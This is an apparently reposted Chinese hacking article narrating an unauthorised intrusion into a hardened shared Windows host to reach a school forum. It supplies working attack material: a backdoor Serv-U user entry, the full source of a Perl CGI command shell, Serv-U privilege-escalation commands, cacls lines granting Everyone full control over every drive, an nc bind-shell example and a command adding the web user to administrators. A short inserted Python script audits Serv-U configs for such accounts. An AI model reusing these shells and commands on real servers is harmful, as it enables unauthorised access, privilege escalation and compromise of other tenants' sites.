Off the Beaten Path: An Indirect Intrusion

xiaoxiao 2021-03-06

Note: The techniques in this article are not new, and there is not much technical depth involved; what matters is the penetration mindset. This article was published in the magazine "Hacker X Files"; copyright belongs to www.4ngel.net and the magazine.

I finally graduated from high school, so I had to study hard over the summer vacation. I had been studying all along, but my earlier intrusions were small stuff, mostly from books, and I badly lacked hands-on experience. So I decided to spend the summer catching up on penetration technique, and to take a look at the security of domestic hosts along the way. In June I spent about a month on penetration work and learned a lot of good ideas and experience from Xiaolu. Thank you, thank you.

In a little over a month I went through hundreds of servers: standalone machines, virtual hosts, clusters, domestic and foreign. I found an extremely serious problem: on foreign servers the general level of security is very high and the administrators' security awareness is very high. As a proportion, if on average 6 or more out of 10 domestic servers can be penetrated, then abroad and in Taiwan on average only 1 out of 10 can. Of course, my own level is also a factor, but it does reflect that domestic administrators are several grades below their foreign counterparts. The skills and awareness of domestic administrators urgently need to improve substantially.

That said, there are also BT (hardcore) administrators, and I ran into several of their servers. On one of them the Documents and Settings directory even contained an nsfocus directory; was it hardened by NSFOCUS? We didn't take that server. There was another one, and that is today's subject.

Once I came across a school forum (http://www.school.com) that was very busy, and suddenly got interested. I pinged it and found all four packets came back "Request timed out", probably a policy or a firewall. I like web security, so I naturally look for an opening from the site itself. Since I started learning web, I've picked up a quirk: if I can't find any vulnerability from the web side, I would rather give up than touch a vulnerability scanner.

I had a rough look at the site. It is a forum running LeadBBS. There were other avenues too: visiting the IP directly returned "No web site is configured at this address.", so my first judgment was that it was a virtual host. Why do mass site defacers have such a high success rate? Because the site http://whois.webhosting.info lets you query how many domain names are bound to an IP. If it is a virtual host, then the school forum having no vulnerability doesn't mean the other sites have none. Soon, through a small company's site (http://ihost/) running DVBBS 6.0, I uploaded an ASP shell, only to find that I could only operate inside my own directory. And programs could not be executed from that directory either, but FSO still worked, so I jumped to other directories by hand in the URL. There wasn't much to browse; the important Program Files and Documents and Settings directories could not be listed. From the feedback of the ASP shell, each site had its own separate user, and everything seemed locked down tight.

Aimless directory hopping...

Out of habit I jumped to C:\PHP in the URL, and unexpectedly it was there, so the host most likely supported PHP. I immediately uploaded a phpspy, got lucky, and saw the login page. But what I hadn't expected was that php.ini had also been locked down: safe mode was on, the phpinfo function was disabled, and detailed system information couldn't be seen. Still, from the probe built into phpspy I could see that allow_url_fopen, display_errors and register_globals were unknown, and that the functions system, passthru, exec and shell_exec were disabled. Jumping directories directly still only showed those same directories. Every site's directory looked like "D:\Websites\school.com#dlfjurdlkfjk", with a different string for each site, but you could still jump into them. Later I guessed the string after the # was the FTP password; I kept trying but could not log in. It looked like a dead end... Is it over? No. I tried FTP:

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\Documents and Settings\Administrator>ftp www.school.com
    Connected to www.school.com.
    220 Welcome To FTP Server ...
    User (www.bjtrq.com:(none)):
    331 User name okay, need password.
    Password:
    530 Not logged in.
    Login failed.
    ftp> bye
    221 Goodbye!

Judging from the information returned, there was still hope. Although he had changed the FTP server's banner, from "User name okay, need password." I made a bold judgment: this server was running Serv-U. I have exploits for every version; if I could upload one and get it executed, everything would be clear. So the question was, which directory could I write to? At the time there was no sessiondata directory under C:\PHP, and it wasn't the automatic-install version; the administrator had probably changed the session directory. Otherwise that directory would have been writable by Everyone...

It turned out I had forgotten a most important directory: c:\documents and settings\all users. You can learn a lot from this directory; it is shared, so at least everyone can read it, and from it we can learn a lot of useful things. I went straight to it by hand through my ASP shell, heh heh, and saw the directory tree I wanted to see:

    Application Data
    Documents
    DRM
    Favorites
    Templates
    Start Menu
    Desktop

I immediately tried to create a file, but unfortunately the directory and its subdirectories were locked down; the BT administrator's permission settings really were strict. Still, we had a harvest: the "c:\documents and settings\all users\Start Menu\Programs\" directory gave useful information that decided the outcome:

    ActiveState ActivePerl 5.8
    Administrative Tools
    Deerfield.com
    DTemp
    IPSentry
    MBM 5
    NetMeter
    Network ICE
    Persits Software AspEmail
    Persits Software AspJpeg
    Serv-U FTP Server
    Symantec Client Security
    Windows Optimization Master
    Boot Manager
    WinRAR
    Tools
    Accessories

Oh, now we know a lot of useful things. Looking at this list you can see the administrator cares a great deal about security and efficiency. Perl is installed, which means CGI may be supported. IPSentry monitors all kinds of services on the site in real time; when a service stops, the software pages, emails, sounds an alarm or runs other software to alert the administrator so the server keeps serving, which shows the administrator is responsible. NetMeter monitors network traffic. The BlackICE firewall and the server edition of Norton AntiVirus are installed, which shows the administrator is very careful about security. And that still wasn't enough: he also installed another firewall, VisNetic Firewall. Really BT to the extreme. Windows Optimization Master is installed too, which shows this administrator likes to tinker. Under Administrative Tools we also saw Terminal Services Client Creator.lnk and Terminal Services Configuration.lnk, so Terminal Services is there. Good: with luck, one more 3389 box.

First I downloaded one of the Serv-U shortcuts through the ASP shell and checked the target in its properties locally. Heh, the Serv-U directory turned out to be "C:\Program Files\ewfq4qrqtgy4635\Serv-U\". Good, jump straight to that directory. Oh~, yes~~, saw it. Modify the ServUDaemon.ini file right away. This server actually has 280 users, amazing... Anyway, first add under [Domain1]:

    User281=angel|1|0

and then add:

    [USER=angel|1]
    Password=NG98F85379EA68DBF97BAADCA99B69B805
    HomeDir=D:\Websites
    RelPaths=1
    TimeOut=600
    Maintenance=System
    Access1=D:\Websites|RWAMELCDP
    SKEYValues=

This adds a user angel with password 111111 and the highest privileges; then we can FTP in and use quote site exec xxxxxxxx. Hee hee, in progress...
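The defensive side of the ServUDaemon.ini change described above, as an added example that is not part of the original article: a small Python audit that parses the [USER=...] sections in the layout shown on the page and flags the two things that make an added account dangerous on a shared host: Maintenance=System (server administration from an FTP login) and write access to a directory that contains another tenant's home. The sample ini is constructed, password lines are omitted, and the meaning of the W flag in the Access rights string is an assumption.

```python
import re
# Constructed sample in the ServUDaemon.ini layout the article shows (no password lines).
SAMPLE_INI = """\
[Domain1]
User1=webuser|1|0
User2=angel|1|0
[USER=webuser|1]
HomeDir=D:\\Websites\\school.com#dlfjurdlkfjk
Access1=D:\\Websites\\school.com#dlfjurdlkfjk|RWAMELCDP
[USER=angel|1]
HomeDir=D:\\Websites
Maintenance=System
Access1=D:\\Websites|RWAMELCDP
"""
USER_SECTION = re.compile(r"^\[USER=([^|\]]+)\|\d+\]$", re.IGNORECASE)

def parse_users(ini_text):
    """Map user name -> {"homedir", "maintenance", "access": [(path, rights)]}."""
    users, cur = {}, None
    for raw in ini_text.splitlines():
        line = raw.strip()
        if line.startswith("["):                     # section header; only [USER=...] matters
            m = USER_SECTION.match(line)
            cur = users.setdefault(m.group(1), {"access": []}) if m else None
        elif cur is not None and "=" in line:
            key, _, value = line.partition("=")
            key, value = key.strip().lower(), value.strip()
            if key.startswith("access"):             # AccessN=<path>|<rights letters>
                path, _, rights = value.partition("|")
                cur["access"].append((path.strip(), rights.strip().upper()))
            else:
                cur[key] = value
    return users

def covers(parent, child):
    """True if parent is child or an ancestor directory (Windows, case-insensitive)."""
    parent, child = [p.replace("/", "\\").rstrip("\\").casefold() for p in (parent, child)]
    return child == parent or child.startswith(parent + "\\")

def audit(ini_text):
    """(user, reason) findings: Maintenance=System, or 'W' (write, assumed) over another home."""
    users, findings = parse_users(ini_text), []
    for name, u in users.items():
        if u.get("maintenance", "none").lower() == "system":
            findings.append((name, "Maintenance=System grants server administration"))
        for path, rights in u["access"]:
            for other, o in users.items():
                if "W" in rights and other != name and covers(path, o.get("homedir", "")):
                    findings.append((name, f"write access to {path} reaches home of {other}"))
    return findings
```

Run against a real ServUDaemon.ini, any account with a finding is one to review, since on a virtual host each site is supposed to be confined to its own directory.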

But cruel reality smashed my plan once again: after modifying the file and submitting it, the change did not go through. It seemed to be a permissions issue. Permissions are a huge thing.

There was still hope, though, because we had just seen that the system had BlackICE installed, and some versions have the "ISS RealSecure/BlackICE Protocol Analysis Module SMB Analysis Stack Overflow Vulnerability", which can be exploited remotely. But I had no compiler on hand and no way to compile the code.

There was Perl, and that was a big breakthrough, because the Perl directory generally wants Everyone full control; whether it is used through ISAPI or perl.exe, it is usually writable and executable. I downloaded the Perl shortcut to see the path, heh, and saw it: d:\user\bin was the bin directory where Perl's files live, so this directory might be writable and might be executable. I immediately uploaded su.exe (the local privilege escalation exploit for all Serv-U versions current at the time). Heh heh, it uploaded, great. Now how to execute it? The ASP shell and the PHP shell couldn't, so the last hope was a CGI shell. I searched and searched and finally found one on my hard drive. I'm getting old; the file was dated June 30, 2002. The code is as follows:

    #!/usr/bin/perl
    # Minimal CGI command shell: runs the query string as a command and returns its output.
    binmode(STDOUT);
    syswrite(STDOUT, "Content-Type: text/html\r\n\r\n", 27);
    $_ = $ENV{QUERY_STRING};
    s/%20/ /ig;                    # decode URL-encoded spaces
    s/%2f/\//ig;                   # decode URL-encoded slashes
    $execthis = $_;
    syswrite(STDOUT, "<HTML><PRE>\r\n", 13);
    open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";   # show errors in the page too
    system($execthis);
    syswrite(STDOUT, "\r\n</PRE></HTML>\r\n", 17);
    close(STDERR);
    close(STDOUT);
    exit;

This is the best CGI shell I've used. I saved it as a .cgi file and... dizzy... .cgi is not supported at all! A wave of depression, and after two seconds of it I thought of one more hope: the .pl extension, which we hadn't tried yet. I renamed the .cgi file to .pl and submitted http://anyhost/cmd.pl?dir. My God!!

It displayed "Access is denied", but it finally executed! Too excited; submit right away:

    http://anyhost/cmd.pl?d:/user/bin/su.exe

It returned:

    Serv-U > 3.x local Exploit by xiaolu
    Usage:   serv-u.exe "command"
    Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"

Hey~~ right now we only have IUSR privileges. What next? Let's see if it is still not dead this time. Submit:

    http://anyhost/cmd.pl?d:/user/bin/su.exe "cacls.exe c:\ /e /t /g everyone:f"
    http://anyhost/cmd.pl?d:/user/bin/su.exe "cacls.exe d:\ /e /t /g everyone:f"
    http://anyhost/cmd.pl?d:/user/bin/su.exe "cacls.exe e:\ /e /t /g everyone:f"
    http://anyhost/cmd.pl?d:/user/bin/su.exe "cacls.exe f:\ /e /t /g everyone:f"

The information returned shows success!!!

    Serv-U > 3.x local Exploit by xiaolu
    < 220 Serv-U FTP Server v5.2 for WinSock ready...
    > user local
    < 331 user name okay, need password.
    ***************************************************************
    > pass #l@$AK#@P
    < 230 user logged in, proceed.
    ***************************************************************
    > site maintenance
    ***************************************************************
    [ ] Creating new domain...
    < 200-DomainID=2
    < 220 Domain settings saved
    ***************************************************************
    [ ] Domain XL:2 created
    [ ] Creating evil user
    < 200-User=XL
    < 200 User settings saved
    ***************************************************************
    [ ] Now exploiting...
    > user xl
    < 331 user name okay, need password.
    ***************************************************************
    > pass 111111
    < 230 user logged in, proceed.
    ***************************************************************
    [ ] Now executing: cacls.exe c:\ /e /t /g everyone:f
    < 220 Domain deleted
    ***************************************************************

After each submission I waited a while, because these commands take time to process. After a bit, all partitions were set to Everyone full control and the disks could be operated on, but some commands were still restricted because our privileges had not actually been raised. So now we upgrade our user to an administrator:

    http://anyhost/cmd.pl?d:/user/bin/su.exe "net localgroup administrators IUSR_anyhost /add"

Now the commands we execute through the web run as Administrator, and I believe everyone knows what to do from here. I found that school's directory and went in~~ Goal reached. I still wanted to make it a 3389 box, but thinking about it, this is the BT administrator's site; how long could I hold it? I left a note on the desktop to tell him. OVER.

Seriously, in all this time I had never met such a tricky virtual host; if he hadn't installed Perl it really would have been a dead end! The technique in this article isn't advanced; I just want to share the idea. If anyone gets something out of it, this article has done its job.

Please credit the original when reposting: https://www.9cbs.com/read-74365.html
